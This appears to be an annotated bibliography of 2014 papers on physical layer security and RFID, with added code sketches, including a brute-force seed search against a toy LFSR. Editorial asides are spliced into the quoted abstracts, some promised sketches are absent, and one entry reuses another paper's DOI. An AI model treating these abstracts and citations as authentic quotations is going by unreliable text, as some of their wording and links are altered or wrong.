  • Vaidyanathaswami, Rajaraman; Thangaraj, Andrew, "Robustness of Physical Layer Security Primitives Against Attacks on Pseudorandom Generators," Communications, IEEE Transactions on , vol.62, no.3, pp.1070,1079, March 2014. (ID#:14-1725) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6730892&isnumber=6777265 Physical layer security protocols exploit inviolable physical laws at the signal level for providing guarantees on secrecy of communications. These protocols invariably involve randomized encoding at the transmitter, for which an ideal random number generator is typically assumed in the literature. In this work, we study the impact of using weak Pseudo Random Number Generators (PRNGs) in physical layer security protocols for coding and forward key distribution over Binary Symmetric and Gaussian wiretap channels. In the case of wiretap channel coding, we study fast correlation attacks that aim to retrieve the initial seed used in the PRNGs. Our results show that randomized coset encoding, which forms an important part of wiretap channel coding, provides useful robustness against fast correlation attacks. In the case of single-round or forward key distribution over a Gaussian wiretap channel, the bits from a PRNG are nonlinearly transformed to generate Gaussian-distributed pseudo random numbers at the transmitter. In such cases, we design modified versions of the fast correlation attacks accounting for the effects of the nonlinear transformation and soft input. We observe that, even for moderately high memory, the success probability of the modified fast correlation attacks become the same as that of a random guess in many cases. Keywords: correlation; Encoding; Generators; Physical layer; Protocols; Security; Vectors; Fast correlation; key distribution protocols; physical layer security; wiretap channel
  • Gupta, V.K.; Jindal, P., "Cooperative Jamming and Aloha Protocol for Physical Layer Security," Advanced Computing & Communication Technologies (ACCT), 2014 Fourth International Conference on , vol., no., pp.64,68, 8-9 Feb. 2014. (ID#:14-1726) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6783427&isnumber=6783406 or http://dl.acm.org/citation.cfm?id=2605698.2605832 Cooperative jamming, a potential supplement, can be used to improve physical layer based security by transmitting a weighted jamming signal to create interference at the eavesdropper. The secrecy rate is derived for the cooperative jamming technique in terms of network throughput. We have analyzed the effect of the Aloha protocol with cooperative jamming on the secrecy capacity of a large scale network. To implement cooperative jamming with the Aloha protocol, a transmitter can be considered either a source or a friendly jammer with message transmission probability p. We observed that an optimum level of security can be achieved for a specific value of jammer power using cooperative jamming, and at a moderate value of the message transmission probability p using cooperative jamming with the Aloha protocol. (A toy numerical sketch of jamming's effect on the secrecy rate appears after this list.) Keywords: access protocols; channel capacity; cooperative communication; cryptographic protocols; interference suppression; jamming; radio transmitters; telecommunication security; Aloha protocol; cooperative jamming technique; eavesdropper; interference suppression; message transmission probability; network throughput; physical layer security; secrecy capacity; secrecy rate; transmitter; weighted jamming signal transmission; Jamming; Physical layer; Protocols; Security; Throughput; Wireless networks; Aloha; friendly jammer; path loss exponent; physical layer security
  • Yifei Zhuang; Lampe, Lutz, "Physical layer security in MIMO power line communication networks," Power Line Communications and its Applications (ISPLC), 2014 18th IEEE International Symposium on , vol., no., pp.272,277, March 30-April 2, 2014. (ID#:14-1727) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6812346&isnumber=6812309 or http://dl.acm.org/citation.cfm?id=2580129.2580645 It has well been established that multiple-input multiple-output (MIMO) transmission using multiple conductors can improve the data rate of power line communication (PLC) systems. In this paper, we investigate whether the presence of multiple conductors could also facilitate the communication of confidential messages by means of physical layer security methods. In particular, this paper focuses on the secrecy capacity of MIMO PLC. Numerical experiments show that multi-conductor PLC networks can enable a more secure communication compared to the single conductor case. On the other hand, we demonstrate that the keyhole property of PLC channels generally diminishes the secure communication capability compared to what would be achieved in a similar wireless communications setting. Keywords: Conductors; Impedance; MIMO; OFDM; Receivers; Signal to noise ratio; Wireless communication; MIMO; Power line communication; physical layer security
  • Bo Liu; Lijia Zhang; Xiangjun Xin; Yongjun Wang, "Physical Layer Security in OFDM-PON Based on Dimension-Transformed Chaotic Permutation," Photonics Technology Letters, IEEE, vol.26, no.2, pp.127,130, Jan.15, 2014. (ID#:14-1728) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6657686&isnumber=6693740 A physical layer security enhanced orthogonal frequency division multiplexing (OFDM) passive optical network based on dimension-transformed chaotic permutation is proposed and experimentally demonstrated. In this scheme, a large key space is obtained by multidomain jointed Rossler permutation, and the corresponding complexity scale caused by multidomain encryption can be reduced through dimension-transformed permutation. An experiment with a 10.61-Gb/s encrypted optical OFDM access system is performed to demonstrate the proposed method. Keywords: OFDM modulation; cryptography; optical chaos; optical computing; optical fiber networks; passive optical networks; telecommunication security; OFDM-PON; bit rate 10.61 Gbit/s; corresponding complexity scale; dimension-transformed chaotic permutation; encrypted optical OFDM access system; large key space; multidomain encryption; multidomain jointed Rossler permutation; orthogonal frequency division multiplexing passive optical network; physical layer security; Encryption; OFDM; Optical network units; Passive optical networks; Space vehicles; Transforms; Orthogonal frequency division multiplexing; Rossler mapping; dimension-transform; passive optical network
  • Geraci, G.; Dhillon, H.S.; Andrews, J.G.; Yuan, J.; Collings, I.B., "Physical Layer Security in Downlink Multi-Antenna Cellular Networks," Communications, IEEE Transactions on, vol.62, no.6, pp.2006,2021, June 2014. (ID#:14-1729) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6782290&isnumber=6839072 In this paper, we study physical layer security for the downlink of cellular networks, where the confidential messages transmitted to each mobile user can be eavesdropped both by 1) the other users in the same cell and 2) the users in the other cells. The locations of base stations and mobile users are modeled as two independent two-dimensional Poisson point processes. Using the proposed model, we analyze the secrecy rates achievable by regularized channel inversion (RCI) precoding by performing a large-system analysis that combines tools from stochastic geometry and random matrix theory. We obtain approximations for the probability of secrecy outage and the mean secrecy rate, and characterize regimes where RCI precoding achieves a non-zero secrecy rate. We find that unlike isolated cells, if one treats interference as noise, the secrecy rate in a cellular network does not grow monotonically with the transmit power, and the network tends to be in secrecy outage if the transmit power grows unbounded. Furthermore, we show that there is an optimal value for the base station deployment density that maximizes the secrecy rate, and this value is a decreasing function of the transmit power. (A sketch of the RCI precoder follows this list.) Keywords: Downlink; Interference; Physical layer; Security; Signal to noise ratio; Stochastic processes; Physical layer security; cellular networks; linear precoding; random matrix theory (RMT); stochastic geometry
  • Romero-Zurita, N.; McLernon, D.; Ghogho, M., "Physical Layer Security By Robust Masked Beamforming And Protected Zone Optimization," Communications, IET, vol.8, no.8, pp.1248,1257, May 22, 2014. (ID#:14-1730) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6827061&isnumber=6827053 The authors address physical layer security in multiple-input single-output communication systems. This study introduces a robust strategy to cope with channel state information errors in the main link in order to convey confidential information to a legitimate receiver while artificial noise is broadcast to confuse an unknown eavesdropper. The authors study how an eavesdropper physically located in the vicinity of the transmitter can put the network's security at risk, and hence, as a countermeasure, a 'protected zone' is deployed to prevent close-quarters eavesdropping attacks. The authors determine the size of the protected zone and the transmission covariance matrices of the steering information and the artificial noise both to maximize the worst-case secrecy rate in a resource-constrained system and to minimize the use of resources needed to ensure an average secrecy rate. The proposed robust masked beamforming scheme offers secure performance even with erroneous estimates of the main channel, showing that a protected zone not only enhances transmission security but also allows an efficient use of energy by prioritizing the available resources. (A minimal artificial-noise beamforming sketch follows this list.) Keywords: (not provided)
  • Saeed Ur Rehman, Kevin W. Sowerby, Colin Coghill, "Analysis of Impersonation Attacks On Systems Using RF Fingerprinting And Low-End Receivers," Journal of Computer and System Sciences, Volume 80 Issue 3, May, 2014, (Pages 591-601). (ID#:14-1731) Available at: http://dl.acm.org/citation.cfm?id=2567015.2567377&coll=DL&dl=GUIDE&CFID=507431191&CFTOKEN=68808106 or http://dx.doi.org/10.1016/j.jcss.2013.06.013 Recently, physical layer security commonly known as Radio Frequency (RF) fingerprinting has been proposed to provide an additional layer of security for wireless devices. A unique RF fingerprint can be used to establish the identity of a specific wireless device in order to prevent masquerading/impersonation attacks. In the literature, the performance of RF fingerprinting techniques is typically assessed using high-end (expensive) receiver hardware. However, in most practical situations receivers will not be high-end and will suffer from device-specific impairments which affect the RF fingerprinting process. This paper evaluates the accuracy of RF fingerprinting employing low-end receivers. The vulnerability to an impersonation attack is assessed for a modulation-based RF fingerprinting system employing low-end commodity hardware (by legitimate and malicious users alike). Our results suggest that receiver impairment effectively decreases the success rate of an impersonation attack on RF fingerprinting. In addition, the success rate of an impersonation attack is receiver dependent. Keywords: Hardware security, Impersonation attack, Physical layer security, Radio fingerprinting
  • Peng Xu, Xiaodong Xu, "A Cooperative Transmission Scheme for the Secure Wireless Multicasting," Wireless Personal Communications: An International Journal, Volume 77 Issue 2, July 2014, (Pages 1239-1248). (ID#:14-1732) Available at: http://dl.acm.org/citation.cfm?id=2633692.2633744&coll=DL&dl=GUIDE&CFID=507431191&CFTOKEN=68808106 or http://dx.doi.org/10.1007/s11277-013-1563-4 In this paper, a wireless multicast scenario with secrecy constraints is considered, where the source wishes to send a common message to two intended destinations in the presence of a passive eavesdropper. One destination is equipped with multiple antennas, and the other three nodes are each equipped with a single antenna. In contrast to conventional direct transmission, we propose a cooperative transmission scheme based on cooperation between the two destinations. The basic idea is to divide the multicast scenario into two cooperative unicast transmissions over two phases, with the two destinations helping each other to jam the eavesdropper in turn. Such cooperative transmission does not require knowledge of the eavesdropper's channel state information. Both analytic and numerical results demonstrate that the proposed cooperative scheme can achieve zero-approaching outage probability. Keywords: Cooperative transmission, Multicast, Outage probability, Secrecy rate
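The entries above describe several constructions concretely enough to illustrate. The first sketch shows the basic correlation-attack idea underlying the Vaidyanathaswami and Thangaraj paper: a brute-force seed search against a toy 8-bit LFSR observed through a noisy channel. This is far simpler than a true fast correlation attack, and the register length, taps, and noise level are illustrative assumptions only.

    import random

    def lfsr_stream(seed, taps, n, length=8):
        # Toy 8-bit LFSR; taps are the bit positions XORed into the feedback bit.
        state = [(seed >> i) & 1 for i in range(length)]
        out = []
        for _ in range(n):
            out.append(state[0])
            fb = 0
            for t in taps:
                fb ^= state[t]
            state = state[1:] + [fb]
        return out

    def correlation_attack(observed, taps, n):
        # Try every seed; keep the one whose keystream agrees most often.
        best_seed, best_agree = None, -1
        for seed in range(1, 256):
            agree = sum(a == b for a, b in zip(lfsr_stream(seed, taps, n), observed))
            if agree > best_agree:
                best_seed, best_agree = seed, agree
        return best_seed

    taps = [0, 2, 3, 4]                 # illustrative feedback taps
    true_seed = 0b10110101
    keystream = lfsr_stream(true_seed, taps, 200)
    # The attacker sees the keystream through a binary symmetric channel (p=0.3).
    observed = [b ^ (random.random() < 0.3) for b in keystream]
    print(correlation_attack(observed, taps, 200) == true_seed)   # usually True
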
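The Gupta and Jindal analysis rests on the standard wiretap secrecy rate, Cs = max(0, log2(1 + SINR_dest) - log2(1 + SINR_eve)). The short computation below, with invented link budgets, shows how a friendly jammer, assumed to be nulled at the destination but not at the eavesdropper, enlarges that rate.

    from math import log2

    def secrecy_rate(sinr_dest, sinr_eve):
        # Achievable secrecy rate (bits/s/Hz) of a Gaussian wiretap channel.
        return max(0.0, log2(1 + sinr_dest) - log2(1 + sinr_eve))

    P, N0 = 10.0, 1.0                          # transmit power, noise (illustrative)
    g_dest, g_eve, g_jam_eve = 1.0, 0.8, 0.5   # assumed channel gains
    J = 4.0                                    # jammer power

    no_jam = secrecy_rate(P * g_dest / N0, P * g_eve / N0)
    # Jamming degrades only the eavesdropper's SINR in this idealized model.
    with_jam = secrecy_rate(P * g_dest / N0, P * g_eve / (N0 + J * g_jam_eve))
    print(f"without jamming: {no_jam:.2f} bits/s/Hz")   # ~0.29
    print(f"with jamming:    {with_jam:.2f} bits/s/Hz") # ~1.59
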
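For the Zhuang and Lampe entry, the relevant baseline is the Gaussian MIMO wiretap channel. Writing H_m and H_e for the channels to the legitimate receiver and the eavesdropper, Q for the transmit covariance, and P for the power budget, an achievable secrecy rate is the familiar difference of log-determinants (stated here as background, not as the paper's own derivation):

    C_s \;=\; \max_{Q \succeq 0,\; \operatorname{tr}(Q) \le P}
    \Big[ \log_2 \det\!\big(I + H_m Q H_m^{H}\big)
        \;-\; \log_2 \det\!\big(I + H_e Q H_e^{H}\big) \Big]^{+}

Loosely, the keyhole property of PLC channels that the authors discuss acts like a rank constraint on the effective channel matrices, which caps the first term and so diminishes the achievable secrecy rate.
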
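Regularized channel inversion, the precoder analyzed by Geraci et al., is compact enough to write out. The NumPy fragment below forms W = H^H (H H^H + alpha I)^(-1) for a random channel and scales it to a unit power budget; the dimensions and the regularization parameter are assumptions for the example, not values from the paper.

    import numpy as np

    rng = np.random.default_rng(0)
    K, M = 4, 8                      # users, base-station antennas (illustrative)
    H = (rng.standard_normal((K, M)) + 1j * rng.standard_normal((K, M))) / np.sqrt(2)

    alpha = K / 10.0                 # regularization parameter (assumed)
    # RCI precoder: W = H^H (H H^H + alpha I)^(-1), scaled to unit transmit power.
    W = H.conj().T @ np.linalg.inv(H @ H.conj().T + alpha * np.eye(K))
    W /= np.linalg.norm(W, 'fro')

    # In |H W|, diagonal entries carry each user's signal; off-diagonal entries
    # are residual inter-user leakage, which co-channel eavesdroppers can exploit.
    print(np.round(np.abs(H @ W), 2))
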
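Finally, the masked-beamforming idea in the Romero-Zurita et al. entry (steer the confidential signal toward the legitimate receiver, broadcast artificial noise in the channel's null space) reduces to a little linear algebra. The sketch below ignores the robustness and protected-zone optimization that are the paper's actual contributions; the channel is a random placeholder.

    import numpy as np

    rng = np.random.default_rng(1)
    M = 4                                # transmit antennas (illustrative)
    h = rng.standard_normal(M) + 1j * rng.standard_normal(M)   # main channel

    w = h.conj() / np.linalg.norm(h)     # beamformer toward legitimate receiver

    # Orthonormal basis of the null space of h, via the full SVD.
    _, _, Vh = np.linalg.svd(h.reshape(1, -1))
    Z = Vh[1:].conj().T                  # M x (M-1) artificial-noise basis

    s = 1.0                                                    # confidential symbol
    v = rng.standard_normal(M - 1) + 1j * rng.standard_normal(M - 1)
    x = w * s + Z @ v                                          # transmitted vector

    print(abs(h @ (Z @ v)))   # ~0: the legitimate receiver sees no artificial noise
    print(abs(h @ x))         # the confidential signal survives
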

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Radio Frequency Identification

Radio Frequency Identification



Radio frequency identification (RFID) has become a ubiquitous identification system used to provide positive identification for items as diverse as cheese and pets. Research into RFID technologies continues and the security of RFID tags is being increasingly questioned. The papers presented here start with countermeasures and proceed to area coverage, mobility, reliability, antennas, and tag localization.

  • Guizani, Sghaier, "Security Applications Challenges Of RFID Technology And Possible Countermeasures," Computing, Management and Telecommunications (ComManTel), 2014 International Conference on, vol., no., pp.291,297, 27-29 April 2014. (ID#:14-1757) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6825620&isnumber=6825559 Radio Frequency IDentification (RFID) is a technique for speedy and proficient identification; it has been around for more than 50 years and was initially developed to improve warfare machinery. RFID technology bridges two technologies in the area of Information and Communication Technologies (ICT), namely Product Code (PC) technology and Wireless technology. This broad-based, rapidly expanding technology impacts business, environment and society. The operating principle of an RFID system is as follows. The reader starts a communication process by radiating an electromagnetic wave. This wave is intercepted by the antenna of the RFID tag, placed on the item to be identified. An induced current is created at the tag and activates the integrated circuit, enabling it to send back a wave to the reader. The reader redirects information to the host, where it is processed. RFID is used for a wide range of applications in almost every field (health, education, industry, security, management ...). In this review paper, we focus on agricultural and environmental applications. Keywords: Antennas; Communication channels; ISO standards; Integrated circuits; Radiofrequency identification; Security; Intelligent systems; Management; Product Code; RFID
  • Pascal Urien, Selwyn Piramuthu, "Elliptic Curve-Based RFID/NFC Authentication With Temperature Sensor Input For Relay Attacks," Decision Support Systems, Volume 59, March, 2014, (Pages 28-36). (ID#:14-1758) Available at: http://dl.acm.org/citation.cfm?id=2592306.2592498&coll=DL&dl=GUIDE&CFID=507431191&CFTOKEN=68808106 or http://dx.doi.org/10.1016/j.dss.2013.10.003 Unless specifically designed for its prevention, none of the existing RFID authentication protocols are immune to relay attacks. Relay attacks generally involve the presence of one or more adversaries who transfer unmodified messages between a prover and a verifier. Given that the message content is not modified, it is rather difficult to address relay attacks through cryptographic means. Extant attempts to prevent relay attacks involve measuring signal strength, round-trip distance, and ambient conditions in the vicinity of prover and verifier. While a majority of related authentication protocols are based on measuring the round-trip distance between prover and verifier using several single-bit challenge-response pairs, recent discussions include physical proximity verification using ambient conditions to address relay attacks. We provide an overview of existing literature on addressing relay attacks through ambient condition measurements. We then propose an elliptic curve-based mutual authentication protocol that addresses relay attacks based on (a) the surface temperature of the prover as measured by prover and verifier and (b) measured single-bit round-trip times between prover and verifier. We also evaluate the security properties of the proposed authentication protocol. (An illustrative distance-bounding sketch follows this list.) Keywords: Distance bounding protocol, Mutual authentication, RFID, Relay attack
  • Sangyup Lee; Choong-Yong Lee; Wonse Jo; Dong-Han Kim, "An Efficient Area Coverage Algorithm Using Passive RFID System," Sensors Applications Symposium (SAS), 2014 IEEE, vol., no., pp.366,371, 18-20 Feb. 2014. (ID#:14-1759) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6798977&isnumber=6798900 This paper proposes an efficient area coverage algorithm for multi-agent robotic systems in a smart floor environment built on a passive RFID system. The passive RFID system used in this research allows information to be stored on and read from an RFID tag located within the detection range of the RF antenna. The location information is explicitly stored in the RFID tag, and the smart floor environment is constructed by laying RFID tags on the floor. A mobile robot equipped with an antenna receives the location information from the RFID tag. Based on this information, the position of the mobile robot can be estimated and, at the same time, the efficiency of the area scanning process can be improved compared to other methods, because each robot provides a scanning trace for the other mobile robots. Keywords: microwave antennas; mobile robots; multi-agent systems; path planning; radiofrequency identification; radio navigation; RF antenna detection range; RFID tag; area scanning process; efficient area coverage algorithm; location information; multiagent mobile robotic system; passive RFID system; scanning trace; smart floor environment; Algorithm design and analysis; Floors; Mobile robots; Passive RFID tags; Radio frequency; Robot kinematics; Passive RFID system; RFID; area coverage; localization; smart floor
  • Zhu, W.; Cao, J.; Chan, H.C.B.; Liu, X.; Raychoudhury, V., "Mobile RFID with a High Identification Rate," Computers, IEEE Transactions on , vol.63, no.7, pp.1778,1792, July 2014. (ID#:14-1760) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6470601&isnumber=6840867 An important category of mobile RFID systems is the RFID system with mobile RFID tags. The mobility of RFID tags poses new challenges to designing RFID anti-collision protocols. Existing RFID anti-collision protocols cannot support high tag moving speed and high identification rate simultaneously. These protocols do not distinguish the identification deadlines of moving tags. Also, when tags move fast, they cannot determine the number of unidentified tags in the interrogation area of an RFID reader. In this paper, we propose a schedule-based RFID anti-collision protocol which, given a high identification rate, achieves the maximal tag moving speed. The protocol, without the need to estimate the number of unidentified tags, schedules an optimal number of tags to compete for the channel according to their identification deadlines, so as to achieve the optimal identification performance. The simulation and experiment results show that our approach can increase the moving speed of tags significantly compared with existing approaches, while achieving a high identification rate. Keywords: Belts; Equations; Mobile communication; Protocols; RFID tags; Throughput; Mobile RFID; anti-collision protocol; high identification rate
  • Sabesan, S.; Crisp, M.J.; Penty, R.V.; White, I.H., "Wide Area Passive UHF RFID System Using Antenna Diversity Combined With Phase and Frequency Hopping," Antennas and Propagation, IEEE Transactions on, vol.62, no.2, pp.878,888, Feb. 2014. (ID#:14-1761) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6657729&isnumber=6729042 This paper presents a long range and effectively error-free ultra high frequency (UHF) radio frequency identification (RFID) interrogation system. The system is based on a novel technique whereby two or more spatially separated transmit and receive antennas are used to enable greatly enhanced tag detection performance over longer distances using antenna diversity combined with frequency and phase hopping. The novel technique is first theoretically modelled using a Rician fading channel. It is shown that conventional RFID systems suffer from multi-path fading resulting in nulls in radio environments. We, for the first time, demonstrate that the nulls can be moved around by varying the phase and frequency of the interrogation signals in a multi-antenna system. As a result, much enhanced coverage can be achieved. A prototype RFID system is built based on an Impinj R2000 transceiver. The demonstrator system shows that the new approach improves the tag detection accuracy to 100% over a 20 m x 15 m area, compared with a conventional switched multi-antenna RFID system. Keywords: Rician channels; UHF antennas; antenna arrays; diversity reception; radio transceivers; radiofrequency identification; receiving antennas; transmitting antennas; Impinj R2000 transceiver; Rician fading channel; UHF RFID interrogation system; antenna diversity; error-free ultra high frequency radio frequency identification; frequency hopping; interrogation signals; multiantenna system; multipath fading; phase hopping; prototype RFID system; radio environments; receive antennas; switched multiantenna RFID system; tag detection accuracy; transmit antennas; wide area passive UHF RFID system; Fading; Passive RFID tags; Radio frequency; Rician channels; Transmitting antennas; Detection accuracy; distributed antenna system (DAS); frequency hopping; nulls; passive radio frequency identification (RFID); phase hopping; read range; returned signal strength indicator (RSSI)
  • Goller, Michael; Feichtenhofer, Christoph; Pinz, Axel, "Fusing RFID and Computer Vision For Probabilistic Tag Localization," RFID (IEEE RFID), 2014 IEEE International Conference on , vol., no., pp.89,96, 8-10 April 2014. (ID#:14-1762) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6810717&isnumber=6810700 The combination of RFID and computer vision systems is an effective approach to mitigate the limited tag localization capabilities of current RFID deployments. In this paper, we present a hybrid RFID and computer vision system for localization and tracking of RFID tags. The proposed system combines the information from the two complementary sensor modalities in a probabilistic manner and provides a high degree of flexibility. In addition, we introduce a robust data association method which is crucial for the application in practical scenarios. To demonstrate the performance of the proposed system, we conduct a series of experiments in an article surveillance setup. This is a frequent application for RFID systems in retail where previous approaches solely based on RFID localization have difficulties due to false alarms triggered by stationary tags. Our evaluation shows that the fusion of RFID and computer vision provides robustness to false positive observations and allows for a reliable system operation. Keywords: Antenna measurements; Antenna radiation patterns; Cameras; Radiofrequency identification; Robustness; Trajectory
  • Morgado, T.A.; Alves, J.M.; Marcos, J.S.; Maslovski, S.I.; Costa, J.R.; Fernandes, C.A.; Silveirinha, M.G., "Spatially Confined UHF RFID Detection With a Metamaterial Grid," Antennas and Propagation, IEEE Transactions on, vol.62, no.1, pp.378,384, Jan. 2014. (ID#:14-1763) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6645379&isnumber=6701163 The confinement of the detection region is one of the most challenging issues in Ultra-High Frequency (UHF) Radio Frequency Identification (RFID) systems. Here, we propose a new paradigm to confine the interrogation zone of standard UHF RFID systems. Our approach relies on the use of an all-planar metamaterial wire grid to block the radiation field (i.e., the far-field) of the reader antenna, and thereby obtain a spatially well-confined detection region in the near-field. This solution is analytically and numerically investigated, and then experimentally verified through near-field and tag-reading measurements, demonstrating its effectiveness and robustness under external perturbations. Keywords: UHF antennas; antenna radiation patterns; metamaterial antennas; radiofrequency identification; all-planar metamaterial wire grid; detection region confinement; interrogation zone; metamaterial grid; near-field measurement; radiation field; reader antenna; spatially well-confined detection region; spatially-confined UHF RFID detection; standard UHF RFID systems; tag-reading measurement; ultrahigh-frequency radiofrequency identification systems; Dipole antennas; Metamaterials; Probes; RFID tags; Wires; Metamaterials; near-field UHF RFID; radio frequency identification (RFID); wire media
  • Cook, B.S.; Vyas, R.; Kim, S.; Thai, T.; Le, T.; Traille, A.; Aubert, H.; Tentzeris, M.M., "RFID-Based Sensors for Zero-Power Autonomous Wireless Sensor Networks," Sensors Journal, IEEE , vol.14, no.8, pp.2419,2431, Aug. 2014. (ID#:14-1764) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6701187&isnumber=6841675 Radio frequency identification (RFID) technology has enabled a new class of low cost, wireless zero-power sensors, which open up applications in highly pervasive and distributed RFID-enabled sensing, which were previously not feasible with wired or battery powered wireless sensor nodes. This paper provides a review of RFID sensing techniques utilizing chip-based and chipless RFID principles, and presents a variety of implementations of RFID-based sensors, which can be used to detect strain, temperature, water quality, touch, and gas. Keywords: Antennas; Backscatter; Radiofrequency identification; Temperature sensors; Topology; Wireless sensor networks; RFID; Wireless sensors; inkjet printing; mm-wave
  • Vahedi, E.; Ward, R.K.; Blake, I.F., "Performance Analysis of RFID Protocols: CDMA Versus the Standard EPC Gen-2," Automation Science and Engineering, IEEE Transactions on, vol. PP, no.99, pp.1,12, January 2014. (ID#:14-1765) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6716098&isnumber=4358066 Radio frequency identification (RFID) is a ubiquitous wireless technology which allows objects to be identified automatically. An RFID tag is a small electronic device with an antenna and has a unique identification (ID) number. RFID tags can be categorized into passive and active tags. For passive tags, a standard communication protocol known as EPC-global Generation-2, or briefly EPC Gen-2, is currently in use. RFID systems are prone to transmission collisions due to the shared nature of the wireless channel used by tags. The EPC Gen-2 standard recommends using the dynamic framed slotted ALOHA technique to solve the collision issue and to read the tag IDs successfully. Recently, some researchers have suggested replacing the dynamic framed slotted ALOHA technique used in the standard EPC Gen-2 protocol with the code division multiple access (CDMA) technique to reduce the number of collisions and to improve the tag identification procedure. In this paper, the standard EPC Gen-2 protocol and the CDMA-based tag identification schemes are modeled as absorbing Markov chain systems. Using the proposed Markov chain systems, the analytical formulae for the average number of queries and the total number of transmitted bits needed to identify all tags in an RFID system are derived for both the EPC Gen-2 protocol and the CDMA-based tag identification schemes. In the next step, the performance of the EPC Gen-2 protocol is compared with the CDMA-based tag identification schemes and it is shown that the standard EPC Gen-2 protocol outperforms the CDMA-based tag identification schemes in terms of the number of transmitted bits and the average time required to identify all tags in the system. (A short framed-slotted-ALOHA simulation follows this list.) Keywords: Code division multiple access (CDMA); EPC Gen-2; Markov model; framed ALOHA; radio frequency identification (RFID); tag singulation
  • Chen, L.; Demirkol, I.; Heinzelman, W., "Token-MAC: A Fair MAC Protocol for Passive RFID Systems," Mobile Computing, IEEE Transactions on , vol.13, no.6, pp.1352,1365, June 2014. (ID#:14-1766) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6629988&isnumber=6824285 Passive RFID systems used for inventory management and asset tracking typically utilize contention-based MAC protocols, such as the standard C1G2 protocol. Although the C1G2 protocol has the advantage that it is easy to implement, it suffers from unfairness and relatively low throughput when the number of tags in the network increases. This paper proposes a token-based MAC protocol called Token-MAC for passive RFID systems, which aims a) to provide a fair chance for tags in the network to access the medium without requiring synchronization of the tags, b) to increase the overall throughput, i.e., the tag rate, and c) to enable a high number of tags to be read under limited tag read time availability, which is an especially important challenge for mobile applications. We implement Token-MAC as well as C1G2 and a TDMA-based protocol using Intel WISP passive RFID tags and perform experiments. Additionally, based on our experimental results, we develop energy harvesting and communication models for tags that we then use in simulations of the three protocols. Our experimental and simulation results all show that Token-MAC can achieve a higher tag rate and better fairness than C1G2, and it can provide better performance over a longer range compared with the TDMA-based protocol. It is also shown that Token-MAC achieves much lower tag detection delay, especially for high numbers of tags. Token-MAC is, therefore, a promising solution for passive RFID systems. Keywords: Media Access Protocol; Mobile computing; Passive RFID tags; Thigh; Time division multiple access;C1G2 protocol; Data communications; General; MAC protocol; Passive RFID
  • Measel, Ryan; Lester, Christopher S.; Xu, Yifei; Primerano, Richard; Kam, Moshe, "Detection Performance Of Spread Spectrum Signatures For Passive, Chipless RFID," RFID (IEEE RFID), 2014 IEEE International Conference on, vol., no., pp.55,59, 8-10 April 2014. (ID#:14-1767) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6810712&isnumber=6810700 Time-Domain Reflectometry (TDR) RFID tags are passive, chipless tags that use discontinuities along a transmission line to create reflections. The discontinuities may be designed to produce a bipodal signal encoded with the unique identifier of the tag. When multiple tags are co-located and interrogated simultaneously, multiple access interference degrades the ability of the reader to detect the tags accurately. Reader detection can be improved by using spread spectrum signatures as the unique identifiers to limit interference. This work evaluates the ability of Gold codes and Kasami-Large codes to improve detection performance of a passive, chipless TDR RFID system. Simulations were conducted for varying numbers of simultaneously interrogated tags using synthetic tag responses constructed from the measured waveform of a prototype TDR tag. Results indicate that the Gold Code signature set outperforms the Kasami-Large Code signature set and a random, naive set for simultaneous interrogation of fewer than 15 tags. For larger numbers of simultaneous tags, a random set performs nearly as well as the Kasami-Large Code set and provides more useful signatures. (A correlation-detection sketch follows this list.) Keywords: Correlation; Gold; Impedance; Interference; Passive RFID tags; Prototypes
  • Baloch, Fariha; Pendse, Ravi, "A New Anti-Collision Protocol For RFID Networks," Wireless Telecommunications Symposium (WTS), 2014 , vol., no., pp.1,5, 9-11 April 2014. (ID#:14-1768) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6834996&isnumber=6834983 The speed at which RFID tags are read is critical to many RFID applications. Tag collisions can increase the time to gather information from tags in RFID networks. These collisions are unavoidable; however the time spent on them can be reduced using an intelligent medium access protocol. In this paper, the authors present a unique anti-collision protocol that scans for collided and empty slots in an RFID network before querying for tag IDs. The new proposed protocol uses a modified version of the bit scan technique to scan for unsuccessful slots. By identifying these slots using a low overhead scan process, the penalty of collisions and empty slots during the query process is reduced and thus a better end-to-end tag reading time is observed. Keywords: EPC C1G2; Medium Access; Performance; RFID; Scan
  • Ben Niu, Xiaoyan Zhu, Haotian Chi, Hui Li, "Privacy and Authentication Protocol for Mobile RFID Systems," Wireless Personal Communications: An International Journal, Volume 77 Issue 3, August 2014, (Pages 1713-1731). (ID#:14-1769) Available at: http://dx.doi.org/10.1016/j.dss.2013.10.003 Security and privacy issues in RFID technology have gained tremendous attention recently. However, existing work on RFID authentication problems often makes assumptions such as: (1) hash functions can be fully employed in designing RFID protocols; (2) channels between readers and the server are always secure. The first assumption is not suitable for EPC Class-1 Gen-2 tags, and has been challenged in much research work, while the second cannot be directly adopted in mobile RFID applications, where wireless channels between readers and the server are always insecure. To solve these problems, in this paper we propose a novel ultralightweight and privacy-preserving authentication protocol for mobile RFID systems. We use only bitwise XOR and several specially constructed pseudo-random number generators to achieve our aims in the insecure mobile RFID environment. We use GNY logic to prove the security correctness of our proposed protocol. The security and privacy analysis shows that our protocol provides several privacy properties, including tag anonymity, tag location privacy, reader privacy, forward secrecy, and mutual authentication, 